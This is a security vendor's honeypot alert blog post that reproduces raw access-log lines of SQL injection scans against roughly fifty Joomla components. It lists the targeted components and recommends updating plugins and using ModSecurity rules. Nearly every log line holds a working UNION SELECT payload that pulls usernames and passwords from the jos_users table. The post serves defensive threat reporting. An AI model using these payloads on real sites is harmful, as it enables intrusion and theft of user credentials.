[Honeypot Alert] SQL Injection Scanning Targeting Joomla Plugins

The following SQL Injection attack payloads targeting Joomla components were identified in our web honeypot sensor logs:

91.213.96.32 - - [28/Nov/2012:11:31:04 +0100] "GET /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users) HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:31:42 +0100] "GET /index.php?option=com_spidercalendar&date=999999.9' union all select null,null,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,null+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:31:47 +0100] "GET /index.php?option=com_tag&task=tag&lang=es&tag=999999.9' union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:31:49 +0100] "GET /index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users),null-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:00 +0100] "GET /index.php?option=com_discussions&view=thread&catid=0&thread=1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:12 +0100] "GET /index.php?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),8,9 from jos_users--  HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:18 +0100] "GET /index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5 FROM jos_users HTTP/1.1" 400 299 "-" "-"72.167.232.203 - - [28/Nov/2012:11:32:20 +0100] "GET /index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3 FROM jos_users HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:32:35 +0100] "GET /index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:37 +0100] "GET /index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.201.196.10 - - [28/Nov/2012:11:33:32 +0100] "GET /index.php?option=com_biblioteca&view=biblioteca&testo=-a%' UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"74.220.219.107 - - [28/Nov/2012:11:34:09 +0100] "GET /index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:34:12 +0100] "GET /index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:34:26 +0100] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:34:29 +0100] "GET /index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),10,11,12,13,14,15,16,17 FROM jos_users HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:37:07 +0100] "GET /index.php?option=com_listbingo&q=11111&catid=0&search_from_price=999 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),32,33,34,35,36,37 from `jos_users` -- '&search_to_price=2&search=Search&task=ads.search HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:37:08 +0100] "GET /index.php?option=com_answers&task=detail&id=-1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4,5,6,7,8,9 from jos_users where gid=25 limit 1 -- ' HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:37:58 +0100] "GET /index.php?option=com_event&task=details&sid=-61 union select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"98.130.2.75 - - [28/Nov/2012:11:39:33 +0100] "GET /index.php?option=com_jdrugstopics&view=drugsdetails&id=-226 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13 from jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:40:50 +0100] "GET /index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:43:38 +0100] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),11,12,13,14,15,16 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:43:39 +0100] "GET /index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.239.26.52 - - [28/Nov/2012:11:43:59 +0100] "GET /index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,unhex(hex(concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 FROM jos_users/* HTTP/1.1" 400 299 "-" "-"184.168.152.10 - - [28/Nov/2012:11:44:03 +0100] "GET /index.php?option=com_news&id=-148+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.14.76 - - [28/Nov/2012:11:45:19 +0100] "GET /index.php?option=com_catalogproduction&task=viewdetail&id=-9999 union all select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:46:34 +0100] "GET /index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users&task=pay_options&Itemid=138 HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:47:19 +0100] "GET /index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"74.220.219.107 - - [28/Nov/2012:11:47:24 +0100] "GET /index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:47:25 +0100] "GET /index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"62.112.195.221 - - [28/Nov/2012:11:48:07 +0100] "GET /index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.14.76 - - [28/Nov/2012:11:48:49 +0100] "GET /index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"117.20.1.78 - - [28/Nov/2012:11:49:00 +0100] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:49:14 +0100] "GET /index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"117.20.1.78 - - [28/Nov/2012:11:49:21 +0100] "GET /index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.201.196.10 - - [28/Nov/2012:11:49:43 +0100] "GET /index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:49:47 +0100] "GET /index.php?option=com_departments&id=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:49:50 +0100] "GET /index.php?option=com_business&view=businessĀ®ion=37&category_id=-1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:49:52 +0100] "GET /index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"91.213.96.32 - - [28/Nov/2012:11:50:35 +0100] "GET /index.php?option=com_television&view=television&id=-1 UNION SELECT 1,2,3,4,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- HTTP/1.1" 400 299 "-" "-"91.213.96.32 - - [28/Nov/2012:11:51:03 +0100] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:51:14 +0100] "GET /index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:51:20 +0100] "GET /index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:51:30 +0100] "GET /index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:51:34 +0100] "GET /index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- HTTP/1.1" 400 299 "-" "-"178.208.83.27 - - [28/Nov/2012:11:51:36 +0100] "GET /index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8+from+jos_users&op=category_details HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:51:56 +0100] "GET /index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:52:47 +0100] "GET /index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4+from+jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:52:55 +0100] "GET /index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:53:38 +0100] "GET /index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users-- HTTP/1.1" 400 299 "-" "-"184.168.152.11 - - [28/Nov/2012:11:54:53 +0100] "GET /index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"

Here is a listing of the various Joomla Plugins being targeted:

com_aboutcom_amblogcom_answerscom_b2portfoliocom_bibliotecacom_biddingcom_bookcom_bookjoomlascom_brightweblinkscom_businesscom_catalogproductioncom_commediacom_departmentscom_discussionscom_dtregistercom_equotescom_eventcom_expshopcom_flashmagazinedeluxecom_gameqcom_hdvideosharecom_includecom_jabodecom_jdrugstopicscom_joomgalaxycom_joomladatecom_joomloccom_jscalendarcom_leadercom_listbingocom_netinvoicecom_newscom_nfnaddressbookcom_peoplecom_productbookcom_productscom_questioncom_radiocom_rapidrecipecom_simpleshopcom_spidercalendarcom_tagcom_televisioncom_timetrackcom_ttvideocom_versioningcom_videoscom_yanccom_yellowpages

If you are running Joomla, it is highly recommended that you download that most up-to-date plugins from the Joomal extension site to ensure that you do not have an out-dated version that is vulnerable to these attacks.

ModSecurity Commercial Rules

The SpiderLabs Comemrcial ModSecurity Rules Feed includes more than 400 virtual patches for Joomla Component vulnerabilities.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.